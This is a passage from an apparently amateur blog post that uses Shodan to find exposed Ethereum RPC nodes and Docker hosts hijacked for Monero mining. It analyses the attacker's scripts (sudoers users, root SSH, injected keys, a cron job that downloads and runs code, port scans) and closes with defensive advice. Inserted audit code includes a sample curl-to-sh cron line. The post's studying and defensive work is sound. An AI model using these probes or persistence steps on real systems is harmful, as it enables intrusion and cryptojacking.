He who plays with fire gets burnt.

Our situation: as always, insomnia, boredom, whatever! Who knows!

The topic of choice: Cryptocurrency. Let’s see if we can escape poverty and go to Fiji.

Stage: The Planet

Browser: Shodan

We apologize in advance to the analysts and specialists in this field; we are just amateurs with silly interests, eager to go on a spree and have a fun time.

First contact

What are we doing today, bro? Trying to escape poverty. So let's try:

Shodan: ethereum.

Interesting findings: out of 4572 results, most share the same port, 8545, and almost the same service banner: Ethereum RPC enabled. After collecting some documentation, it is time to play. Let's play with the information the protocol gives us.

For example, we want it to give us back the most recent block number:

proxychains curl -s -X POST http://target:8545 -H "Content-Type: application/json" --data '{"jsonrpc":"2.0","method":"eth_blockNumber","params":[],"id":1}'

Result: {"jsonrpc":"2.0","result":"secret","id":1} (the block number is redacted here)

and, if we now ask for the number of transactions in that block:

proxychains curl -s -X POST http://target:8545 -H "Content-Type: application/json" --data '{"jsonrpc":"2.0","method":"eth_getBlockTransactionCountByNumber","params":["secret"],"id":1}'

Result: {"jsonrpc":"2.0","result":"0x79","id":1} (0x79 = 121 transactions)
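The same two-step probe in Python, as an added example that is not code from the original post. It runs offline against a mock node in the same process; the mock's block height 0x5a0f3d and its 0x79 (121) transactions are constructed placeholders for the number the post redacts as "secret", and the mock only knows the two methods used above. The client checks that the response id echoes the request and surfaces JSON-RPC error objects, which is the minimum you want before trusting anything an unknown node returns.

```python
"""Two-step probe of an Ethereum JSON-RPC endpoint, run offline against a mock
node. Added example, not code from the original post. The block height and
transaction count served by the mock are constructed placeholders."""
import json
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed chain state: the post redacts the real height as "secret", so the
# mock serves an arbitrary one with 0x79 (121) transactions, as in the post.
FAKE_HEAD = 0x5A0F3D
FAKE_TX_COUNTS = {FAKE_HEAD: 0x79}


def hex_quantity(value):
    """Decode a JSON-RPC QUANTITY such as "0x79" to an int; reject anything else."""
    if not isinstance(value, str) or not value.startswith("0x"):
        raise ValueError(f"not a hex quantity: {value!r}")
    return int(value, 16)


def mock_node(request):
    """Pure JSON-RPC 2.0 dispatcher standing in for a node's eth_* namespace."""
    method = request.get("method")
    params = request.get("params") or []
    req_id = request.get("id")
    if method == "eth_blockNumber":
        return {"jsonrpc": "2.0", "result": hex(FAKE_HEAD), "id": req_id}
    if method == "eth_getBlockTransactionCountByNumber":
        number = FAKE_HEAD if params[0] == "latest" else hex_quantity(params[0])
        count = FAKE_TX_COUNTS.get(number)
        return {"jsonrpc": "2.0", "result": None if count is None else hex(count), "id": req_id}
    return {"jsonrpc": "2.0", "error": {"code": -32601, "message": "Method not found"}, "id": req_id}


class MockNodeHandler(BaseHTTPRequestHandler):
    """Serve mock_node over HTTP so the real wire format is exercised."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        response = mock_node(json.loads(self.rfile.read(length)))
        body = json.dumps(response).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo output to the probe result
        pass


def http_transport(url):
    """Return a send(request_dict) -> response_dict function for a real endpoint."""
    def send(request):
        req = urllib.request.Request(
            url, data=json.dumps(request).encode(),
            headers={"Content-Type": "application/json"})
        with urllib.request.urlopen(req, timeout=5) as resp:
            return json.loads(resp.read())
    return send


def rpc_call(send, method, params=None, req_id=1):
    """Issue one request; check the id echoes back and surface error objects."""
    response = send({"jsonrpc": "2.0", "method": method, "params": params or [], "id": req_id})
    if response.get("jsonrpc") != "2.0" or response.get("id") != req_id:
        raise RuntimeError(f"{method}: malformed response {response!r}")
    if "error" in response:
        raise RuntimeError(f"{method}: {response['error']}")
    return response["result"]


def probe_node(send):
    """The post's two queries: head block number, then that block's tx count."""
    head = hex_quantity(rpc_call(send, "eth_blockNumber"))
    count = hex_quantity(
        rpc_call(send, "eth_getBlockTransactionCountByNumber", [hex(head)], req_id=2))
    return {"block_number": head, "tx_count": count}


if __name__ == "__main__":
    server = HTTPServer(("127.0.0.1", 0), MockNodeHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        print(probe_node(http_transport(f"http://127.0.0.1:{server.server_address[1]}")))
    finally:
        server.shutdown()
```

Run it directly and it starts the mock on a loopback port and prints the probe result; to point it at a real endpoint, pass `http_transport("http://target:8545")` to `probe_node` (through your proxy of choice, as the curl commands above do with proxychains).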

Umm! What if we leave this cryptocurrency for now and try a cooler one: Monero.

Second contact: this gets interesting

Shodan: monero.

The results show us we are on the right path.

The first thing we notice is not the drop in the number of results; what draws our attention is the change of country and that almost all of them sit with the same cloud service provider. You can check it yourself; we are not giving away those details.

The next, and certainly the most important, thing is the most used service: Docker. What is Docker? We explain it at the end of this article.

Narrowing the search to those services that are also containers, the results take on a more than interesting shade: we can clearly see that there is a Docker container used for mining.

This time we use Shodan's API to download the results and analyze them calmly. The first thing we find is a shell script used to…

Analyzing a script

Bro! This download is taking forever. No fear!

We look at the pastebin URLs, the ones we haven't downloaded yet.

One of those not yet downloaded is a binary file. Now it's time to reverse-engineer it! What a drag! Let's try strings first!

The strings tell us it is a mining container. We also "haven't" downloaded the container's configuration file, the one that launches the miner, so we "don't" have the user's hash, the private key, the pool connection…

Something important to note: the binary's name is camouflaged as that of a quite common server process, the usual trick when you want to hide something important.

We keep analyzing. Judging by the commands it executes, commands that only the superuser can run, we can say there is a privilege escalation. It runs as root!

The script:

  • Creates users and adds them to sudoers with root permissions.
  • Modifies the SSH service's configuration file, enabling login as root and allowing public-key authentication, and then restarts the service.
  • Copies the keys into ~/.ssh/authorized_keys in the home directory of the created user and of root.
  • Changes root's crontab so that every 10 minutes something is downloaded and executed. We haven't been able to download that payload, although we were left wanting to connect to a server and grab it.

It checks whether the packages it needs are installed and, if not, downloads them.

Some of the pastebins are encrypted, but we can decipher them because we have the user's public key: they were produced with the matching private key (a signature-style operation), so anyone holding the public key can reverse it. Note that OpenSSL expects the key in PEM form, not the one-line format used in authorized_keys (ssh-keygen can export it).

echo "algoquepuso" | base64 -d | openssl rsautl -verify -inkey clave.pub -pubin

It modifies the local firewall (iptables and/or ufw), adding rules for the ports used by other miners.

Finally, the attacker, I believe we can call them that, kills any mining processes that might already be there. Logically, they don't want competition!
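If you suspect one of your own hosts was hit by the same script, the artefacts above (root login re-enabled in sshd_config, a new sudoers entry, injected authorized_keys, a 10-minute download-and-execute cron job) are what to look for. The following is an added example, not code from the original post: it audits a filesystem root for those four indicators and runs here against constructed sample files in a scratch directory. The paths assume a stock Debian/Ubuntu layout, and the key material and URL in the samples are placeholders.

```python
"""Audit a Linux host for the persistence artefacts the post attributes to the
miner script. Added example, not from the original post; the sample files are
constructed and the paths assume a stock Debian/Ubuntu layout."""
import os
import re
import tempfile

# Constructed artefacts mirroring the post's description: root login enabled in
# sshd_config, a sudoers drop-in for a new user, injected authorized_keys for
# that user and root, and a root crontab fetching and running something every
# 10 minutes. The key material and URL are placeholders.
SAMPLE_FILES = {
    "etc/ssh/sshd_config": "Port 22\nPermitRootLogin yes\nPubkeyAuthentication yes\n",
    "etc/sudoers.d/svc": "svc ALL=(ALL) NOPASSWD:ALL\n",
    "root/.ssh/authorized_keys": "ssh-rsa AAAAconstructed attacker@example\n",
    "home/svc/.ssh/authorized_keys": "ssh-rsa AAAAconstructed attacker@example\n",
    "var/spool/cron/crontabs/root": "*/10 * * * * curl -fsSL http://example.invalid/x | sh\n",
}

# A 10-minute job that pipes curl/wget output into a shell.
CRON_DOWNLOAD_EXEC = re.compile(r"^\*/10 \* \* \* \*.*\b(curl|wget)\b.*\|\s*(ba)?sh\b", re.M)


def _read(root, rel):
    """Read a file relative to root; a missing file is simply no evidence."""
    try:
        with open(os.path.join(root, rel)) as fh:
            return fh.read()
    except OSError:
        return ""


def _listdir(path):
    return sorted(os.listdir(path)) if os.path.isdir(path) else []


def audit_host(root="/"):
    """Return (indicator, detail) pairs for each artefact found under root."""
    findings = []
    if re.search(r"^\s*PermitRootLogin\s+yes\b", _read(root, "etc/ssh/sshd_config"), re.M):
        findings.append(("sshd_root_login", "PermitRootLogin yes"))
    for name in _listdir(os.path.join(root, "etc/sudoers.d")):
        for line in _read(root, f"etc/sudoers.d/{name}").splitlines():
            if re.search(r"\bALL\s*=\s*\(ALL", line):
                findings.append(("sudoers_full_root", f"{name}: {line.strip()}"))
    key_files = ["root/.ssh/authorized_keys"] + [
        f"home/{user}/.ssh/authorized_keys" for user in _listdir(os.path.join(root, "home"))]
    for rel in key_files:
        for line in _read(root, rel).splitlines():
            if line.strip() and not line.startswith("#"):
                # Every key is reported: the reviewer decides which are legitimate.
                findings.append(("authorized_key", f"{rel}: {line.split()[-1]}"))
    for rel in ("var/spool/cron/crontabs/root", "var/spool/cron/root"):
        for match in CRON_DOWNLOAD_EXEC.finditer(_read(root, rel)):
            findings.append(("cron_download_exec", f"{rel}: {match.group(0)}"))
    return findings


def audit_samples(files=SAMPLE_FILES):
    """Write the constructed files into a scratch root and audit it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, text in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(text)
        return audit_host(root)


if __name__ == "__main__":
    for indicator, detail in audit_samples():
        print(f"{indicator:20} {detail}")
```

Against a real host run `audit_host("/")` as root (or against a mounted disk image by passing its mount point). The authorized_keys indicator reports every key on purpose: the attacker's key only stands out once you know which ones you put there.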

If you've come this far, you get a prize. Tweet this article using the hashtag #porquelovalgo and we will buy you a drink: beer, coffee or a glass of water.

Another script found

The analysis of the Shodan search reveals another script; its analysis shows it has nothing to do with the one above.

In short:

  • It downloads packages such as systemd, masscan and iproute2.
  • It scans ports 2375 and 2379 of the server's subnet.
  • It launches a Docker container.

This tells us that this one doesn't try to mine but to search for vulnerable machines/engines. Port 2375 is the Docker daemon's unencrypted TCP API (2379 is etcd's client port): a daemon reachable there without authentication lets anyone who can connect start a container with host privileges, and that is the "Docker vulnerability" that hands the attacker root.
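What an open 2375 hands back is a list of containers and their host configuration, and reading that list is how both the attacker's scanner and a defender decide what they are looking at. The block below is an added example, not code from the original post: it triages constructed container records for the two things this article is about, settings that amount to root on the host and a miner command line (including the --max-cpu-usage flag the conclusion mentions, here on a miner camouflaged as "sshd" as the post describes). The records merge the fields of GET /containers/json with the HostConfig block of GET /containers/<id>/json; a real client would fetch both, and the list of sensitive bind-mount sources is my own choice.

```python
"""Triage what an unauthenticated Docker Remote API (port 2375) hands back.
Added example, not from the original post. The records below are constructed
and merge the fields of GET /containers/json with the HostConfig block of
GET /containers/<id>/json; a real client would fetch both."""

# Command-line fragments that betray a miner. --max-cpu-usage is the xmrig
# flag the post mentions; the rest are common miner binaries and pool scheme.
MINER_MARKERS = ("xmrig", "--max-cpu-usage", "stratum+tcp://", "minerd")

# Host paths whose bind mount gives the container the run of the host
# (an assumed, deliberately short list).
SENSITIVE_BINDS = ("/", "/etc", "/root", "/var/run/docker.sock")

# Constructed records: a benign web container, a miner camouflaged as "sshd"
# (the post notes the binary was named after a common server process) running
# privileged, and a shell with the host PID namespace and / bind-mounted.
SAMPLE_CONTAINERS = [
    {"Id": "a1", "Names": ["/web"], "Image": "nginx:1.15",
     "Cmd": ["nginx", "-g", "daemon off;"],
     "HostConfig": {"Privileged": False, "PidMode": "", "Binds": []}},
    {"Id": "b2", "Names": ["/sshd"], "Image": "alpine",
     "Cmd": ["/usr/sbin/sshd", "-o", "stratum+tcp://pool.example:3333", "--max-cpu-usage=100"],
     "HostConfig": {"Privileged": True, "PidMode": "", "Binds": []}},
    {"Id": "c3", "Names": ["/dbg"], "Image": "ubuntu",
     "Cmd": ["/bin/sh"],
     "HostConfig": {"Privileged": False, "PidMode": "host", "Binds": ["/:/host:rw"]}},
]


def host_escape_reasons(container):
    """Settings that let the container act as root on the host."""
    hc = container.get("HostConfig") or {}
    reasons = []
    if hc.get("Privileged"):
        reasons.append("privileged")
    if hc.get("PidMode") == "host":
        reasons.append("host pid namespace")
    for bind in hc.get("Binds") or []:
        source = bind.split(":")[0]
        if source in SENSITIVE_BINDS:
            reasons.append(f"bind mount of {source}")
    return reasons


def miner_markers(container):
    """Miner markers found in the container's command line, in MINER_MARKERS order."""
    cmdline = " ".join(container.get("Cmd") or [])
    return [marker for marker in MINER_MARKERS if marker in cmdline]


def triage(containers):
    """Map container name -> findings for every container worth a second look."""
    report = {}
    for container in containers:
        name = container["Names"][0].lstrip("/")
        escape, miner = host_escape_reasons(container), miner_markers(container)
        if escape or miner:
            report[name] = {"host_escape": escape, "miner_markers": miner}
    return report


if __name__ == "__main__":
    for name, findings in triage(SAMPLE_CONTAINERS).items():
        print(name, findings)
```

On your own hosts the same records come out of `docker inspect`. The "dbg" record is the shape of the attack itself: a container started privileged or with / bind-mounted through an unauthenticated daemon is root on the host, no exploit needed.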

Another command found is:

swarm…

This is Docker's native clustering solution: it turns a group of Docker hosts into a single virtual host.

Obtained data

  • the mining pool servers
  • user key, hash.
  • attacker's public key…
  • Some servers had DockerUI installed, which made our life much easier.

Conclusion

We have "gotten our hands on" a group of engines that are mining like crazy; we haven't said it before, but the attacker pins the CPU at 100% (--max-cpu-usage=100).

We know how they got in: a Docker daemon whose API was reachable without authentication, which lets an attacker start a container with host privileges and become root.

Another important thing we saw is the use of ngrok, with which it creates a tunnel to a service. That suggests the service being tunnelled matters to the attacker: it might be their own home machine, a box holding important information…

And all this from a simple Shodan query, searching for cryptocurrency with the sole objective of getting rich and quitting work, and finding a network of servers broken into and used for mining.

We take note of all of this; who knows? Maybe one day we'll have the urge to quit working.

A night of games goes a long way. That’s all, folks.

Wait, we haven't finished yet. Congratulations! You've reached the end and you've got it: use #porfin as a hashtag and you get the drink and a jamón ibérico tapa and, if you don't like it, we'll prepare a salad for you.

Thank you for your attention.

Recommendations

  • Keep your servers updated.
  • Filter connections to and from your servers, both at IP and service level.
  • Never expose the Docker daemon's TCP socket (2375) or a node's RPC port (8545) to the Internet without authentication; bind them to localhost or a management network.
  • Collect the system logs and analyze them; it is a way to see what is happening around you.

What is Docker?

Docker is an open-source platform that lets us create and run Linux containers.

OK, and what is a container? Think of it as a virtual machine: light, modular and flexible. Unlike a VM, though, it shares the host's kernel, which is why a container started with the right privileges can reach the host itself.

With Docker you can separate processes so that they run independently. That isolation matters because it lets you build a safer infrastructure.

In the references section there is more documentation in this regard.

References:

https://es.wikipedia.org/wiki/Alibaba_Group

https://www.jsonrpc.org/

https://docs.pylonsproject.org/projects/webob/en/stable/jsonrpc-example.html

https://github.com/ethereum/wiki/wiki

https://github.com/xmrig/xmrig

https://hackernoon.com/bitcoin-core-bug-cve-2018-17144-an-analysis-f80d9d373362

https://github.com/taskcluster/docker-worker

https://hub.docker.com

https://www.exploit-db.com/exploits/42356

https://ngrok.com/
